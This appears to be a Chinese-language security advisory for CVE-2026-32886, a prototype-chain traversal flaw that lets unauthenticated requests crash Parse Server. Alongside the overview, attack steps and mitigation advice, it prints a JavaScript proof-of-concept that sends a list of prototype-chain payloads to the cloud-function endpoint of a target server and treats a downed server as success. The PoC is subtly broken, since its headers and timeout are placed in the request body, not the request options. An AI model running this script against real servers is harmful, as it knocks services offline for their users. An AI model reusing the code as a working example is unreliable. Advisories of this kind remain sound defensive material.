CVE-2026-32886 Parse Server原型链遍历栈溢出漏洞

漏洞信息

漏洞编号

CVE-2026-32886

漏洞类型

原型链遍历/栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Parse Server

漏洞概述

CVE-2026-32886是Parse Server中的一个高危安全漏洞，CVSS评分7.5，属于高危级别。该漏洞存在于Parse Server 9.6.0-alpha.24和8.6.47之前的版本中。Parse Server是一个开源的后端服务器框架，可以部署到任何支持Node.js运行的基础设施上。漏洞允许远程攻击者通过调用云函数（Cloud Function）端点，利用精心构造的函数名遍历JavaScript原型链，从而触发已注册云函数处理程序的栈溢出，最终导致Parse Server进程崩溃。由于该漏洞无需认证即可利用，且攻击复杂度低，因此对使用受影响版本Parse Server的服务构成严重威胁。目前没有已知的临时缓解措施，强烈建议相关用户立即升级到修复版本。

技术细节

该漏洞的根本原因在于Parse Server在解析云函数名称时，未对属性查找操作进行安全限制。在JavaScript中，对象属性查找会遍历原型链（prototype chain），攻击者可以利用这一特性通过构造特殊的函数名来访问Object.prototype上的隐藏属性或方法。当云函数处理程序被调用时，如果函数名包含原型链遍历语法（如__proto__、constructor等），服务器会尝试沿着原型链向上查找对应的处理函数。由于这种遍历是无边界的，可能导致递归调用栈不断增长，最终触发栈溢出（Stack Overflow）错误，使整个Parse Server进程崩溃。修复方案在版本9.6.0-alpha.24和8.6.47中限制了属性查找仅为对象的自有属性（own properties），从而阻止了原型链遍历攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标服务器运行的是Parse Server，并确定其版本号在受影响范围内（< 9.6.0-alpha.24 或 < 8.6.47）

STEP 2

步骤2

攻击者向Parse Server的云函数端点发送HTTP POST请求，URL路径中包含精心构造的函数名，该函数名包含JavaScript原型链遍历语法

STEP 3

步骤3

Parse Server在解析云函数名称时，尝试查找对应的处理函数，由于未限制属性查找范围，遍历开始沿着原型链向上搜索

STEP 4

步骤4

原型链遍历触发递归查找，导致调用栈不断增长，最终超出JavaScript引擎的栈容量限制

STEP 5

步骤5

栈溢出异常未被正确处理，导致整个Node.js进程崩溃，Parse Server服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-32886 PoC - Parse Server Prototype Chain Traversal Stack Overflow
// Target: Parse Server < 9.6.0-alpha.24 or < 8.6.47

const axios = require('axios');

async function exploit(targetUrl, cloudFunctionName) {
  console.log(`[*] Targeting: ${targetUrl}`);
  console.log(`[*] Exploiting cloud function: ${cloudFunctionName}`);
  
  try {
    // Construct malicious cloud function call
    // Using prototype chain traversal to trigger stack overflow
    const response = await axios.post(`${targetUrl}/parse/functions/${cloudFunctionName}`, {
      params: {},
      headers: {
        'Content-Type': 'application/json',
        'X-Parse-Application-Id': 'test-app-id',
        'X-Parse-REST-API-Key': 'test-rest-api-key'
      },
      timeout: 5000
    });
    console.log('[+] Response received:', response.status);
  } catch (error) {
    if (error.code === 'ECONNREFUSED') {
      console.log('[!] Connection refused - target may be down (exploit successful)');
    } else if (error.response && error.response.status === 500) {
      console.log('[+] Server error 500 - possible exploit trigger');
    } else if (error.code === 'ETIMEDOUT') {
      console.log('[!] Request timeout - server may be crashed');
    } else {
      console.log('[*] Error:', error.message);
    }
  }
}

// Prototype chain traversal payloads
const payloads = [
  '__proto__',
  'constructor.prototype',
  '__proto__.constructor.prototype',
  'hasOwnProperty',
  'valueOf.__proto__',
  'toString.__proto__'
];

// Usage example
const target = 'http://target-server:1337';
payloads.forEach(payload => {
  exploit(target, payload);
});

影响范围

Parse Server < 9.6.0-alpha.24

Parse Server < 8.6.47

防御指南

临时缓解措施

目前没有已知的临时缓解措施可以完全防御此漏洞。建议通过以下方式降低风险：1) 在负载均衡器层面限制对/parse/functions路径的访问频率；2) 监控服务器资源使用情况，及时发现异常请求模式；3) 最重要的还是尽快升级到官方修复版本。